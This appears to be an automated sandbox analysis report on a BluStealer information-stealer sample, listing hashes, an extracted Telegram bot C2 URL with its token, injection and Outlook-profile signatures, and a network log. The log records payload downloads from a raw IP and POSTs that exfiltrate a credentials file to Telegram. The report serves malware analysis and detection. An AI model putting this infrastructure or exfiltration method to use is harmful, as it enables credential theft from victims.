blustealer | af7b23bd61e2a87ccdbcfcb062e8da2723f1a72640623406a1dc81c6b2667f81

General

Target

ORDER3763873.exe
Size

13KB
MD5

fcf1a0e7b406505e0aaa094393d45d72
SHA1

cde2a1b3ef89f2b4c7a2048fa2d959e02c29008e
SHA256

352dd25fbf999c5e12526187390be9af7019db7c165f2e9e76fe7d1cd4bece3b
SHA512

5db78c6c157174cac8f010e8cf00d412a10703dd543ad224c7d81cb9b65b0a03891be95615dc57165761d433a673f316495e825e7a615d57b08b846fb3e52304

Score

10^/10

blustealer collection stealer

Malware Config

Extracted

Family

blustealer

C2

https://api.telegram.org/bot5432809476:AAHtE5EDW3VQZZBLnEbEZpHEIJz5LbF0no/sendMessage?chat_id=5571556378

Signatures

BluStealer
A Modular information stealer written in Visual Basic.
stealer blustealer
Downloads MZ/PE file

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	AppLaunch.exe
Key opened	\REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	AppLaunch.exe
Key opened	\REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	AppLaunch.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4832 set thread context of 4268	4832	ORDER3763873.exe	78
PID 4268 set thread context of 3164	4268	ORDER3763873.exe	79

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	4	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4832	ORDER3763873.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4268	ORDER3763873.exe

Suspicious use of WriteProcessMemory 13 IoCs

description	pid	Process	procid_target
PID 4832 wrote to memory of 4268	4832	ORDER3763873.exe	78
PID 4832 wrote to memory of 4268	4832	ORDER3763873.exe	78
PID 4832 wrote to memory of 4268	4832	ORDER3763873.exe	78
PID 4832 wrote to memory of 4268	4832	ORDER3763873.exe	78
PID 4832 wrote to memory of 4268	4832	ORDER3763873.exe	78
PID 4832 wrote to memory of 4268	4832	ORDER3763873.exe	78
PID 4832 wrote to memory of 4268	4832	ORDER3763873.exe	78
PID 4832 wrote to memory of 4268	4832	ORDER3763873.exe	78
PID 4268 wrote to memory of 3164	4268	ORDER3763873.exe	79
PID 4268 wrote to memory of 3164	4268	ORDER3763873.exe	79
PID 4268 wrote to memory of 3164	4268	ORDER3763873.exe	79
PID 4268 wrote to memory of 3164	4268	ORDER3763873.exe	79
PID 4268 wrote to memory of 3164	4268	ORDER3763873.exe	79

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	AppLaunch.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	AppLaunch.exe

C:\Users\Admin\AppData\Local\Temp\ORDER3763873.exe
"C:\Users\Admin\AppData\Local\Temp\ORDER3763873.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4832
- C:\Users\Admin\AppData\Local\Temp\ORDER3763873.exe
  "C:\Users\Admin\AppData\Local\Temp\ORDER3763873.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4268
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    3⤵
    - Accesses Microsoft Outlook profiles
    - outlook_office_path
    - outlook_win_path
    PID:3164

Network

GET

http://102.37.220.234/htdocs/dZDPM.exe

ORDER3763873.exe

Remote address:

102.37.220.234:80

Request

GET /htdocs/dZDPM.exe HTTP/1.1
Host: 102.37.220.234
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Fri, 22 Jul 2022 17:20:52 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
Last-Modified: Fri, 22 Jul 2022 10:42:11 GMT
ETag: "6e000-5e4627c8d8ae8"
Accept-Ranges: bytes
Content-Length: 450560
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
GET

http://102.37.220.234/xampp/InternalAssemblyBuilder.dll

ORDER3763873.exe

Remote address:

102.37.220.234:80

Request

GET /xampp/InternalAssemblyBuilder.dll HTTP/1.1
Host: 102.37.220.234

Response

HTTP/1.1 200 OK

Date: Fri, 22 Jul 2022 17:20:53 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
Last-Modified: Fri, 22 Jul 2022 09:19:56 GMT
ETag: "9c00-5e4615668746e"
Accept-Ranges: bytes
Content-Length: 39936
Content-Type: application/x-msdownload
DNS

api.telegram.org

ORDER3763873.exe

Remote address:

8.8.8.8:53

Request

api.telegram.org

IN A

Response

api.telegram.org

IN A

149.154.167.220
POST

https://api.telegram.org/bot5432809476:AAHtE5EDW3VQZZBLnkEbEZpHEIJz5LbF0no/sendMessage

ORDER3763873.exe

Remote address:

149.154.167.220:443

Request

POST /bot5432809476:AAHtE5EDW3VQZZBLnkEbEZpHEIJz5LbF0no/sendMessage HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Content-Length: 167
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Fri, 22 Jul 2022 17:21:02 GMT
Content-Type: application/json
Content-Length: 402
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
POST

https://api.telegram.org/bot5432809476:AAHtE5EDW3VQZZBLnkEbEZpHEIJz5LbF0no/sendDocument?chat_id=5571556378&caption=credentials.txt:::QAZKGNUX\Admin

ORDER3763873.exe

Remote address:

149.154.167.220:443

Request

POST /bot5432809476:AAHtE5EDW3VQZZBLnkEbEZpHEIJz5LbF0no/sendDocument?chat_id=5571556378&caption=credentials.txt:::QAZKGNUX\Admin HTTP/1.1
Accept: */*
Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: api.telegram.org
Content-Length: 201
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 400 Bad Request

Server: nginx/1.18.0
Date: Fri, 22 Jul 2022 17:21:03 GMT
Content-Type: application/json
Content-Length: 81
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

102.37.220.234:80

http://102.37.220.234/xampp/InternalAssemblyBuilder.dll

http

ORDER3763873.exe

8.7kB
505.6kB
186
363

HTTP Request

GET http://102.37.220.234/htdocs/dZDPM.exe

HTTP Response

200

HTTP Request

GET http://102.37.220.234/xampp/InternalAssemblyBuilder.dll

HTTP Response

200
149.154.167.220:443

https://api.telegram.org/bot5432809476:AAHtE5EDW3VQZZBLnkEbEZpHEIJz5LbF0no/sendMessage

tls, http

ORDER3763873.exe

1.4kB
7.1kB
13
12

HTTP Request

POST https://api.telegram.org/bot5432809476:AAHtE5EDW3VQZZBLnkEbEZpHEIJz5LbF0no/sendMessage

HTTP Response

200
149.154.167.220:443

https://api.telegram.org/bot5432809476:AAHtE5EDW3VQZZBLnkEbEZpHEIJz5LbF0no/sendDocument?chat_id=5571556378&caption=credentials.txt:::QAZKGNUX\Admin

tls, http

ORDER3763873.exe

1.8kB
6.8kB
16
12

HTTP Request

POST https://api.telegram.org/bot5432809476:AAHtE5EDW3VQZZBLnkEbEZpHEIJz5LbF0no/sendDocument?chat_id=5571556378&caption=credentials.txt:::QAZKGNUX\Admin

HTTP Response

400
52.168.112.67:443

322 B
7
87.248.202.1:80

322 B
7
87.248.202.1:80

322 B
7
209.197.3.8:80

322 B
7

8.8.8.8:53

api.telegram.org

dns

ORDER3763873.exe

62 B
78 B
1
1

DNS Request

api.telegram.org

DNS Response

149.154.167.220

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Email Collection

1

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3164-140-0x0000000000B60000-0x0000000000BC6000-memory.dmp

Filesize
408KB

Download
memory/4268-133-0x0000000000400000-0x000000000046E000-memory.dmp

Filesize
440KB

Download
memory/4268-135-0x0000000000400000-0x000000000046E000-memory.dmp

Filesize
440KB

Download
memory/4268-138-0x0000000000400000-0x000000000046E000-memory.dmp

Filesize
440KB

Download
memory/4268-141-0x0000000000400000-0x000000000046E000-memory.dmp

Filesize
440KB

Download
memory/4832-130-0x0000000000D80000-0x0000000000D8A000-memory.dmp

Filesize
40KB

Download
memory/4832-131-0x00000000062F0000-0x000000000638C000-memory.dmp

Filesize
624KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Response

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.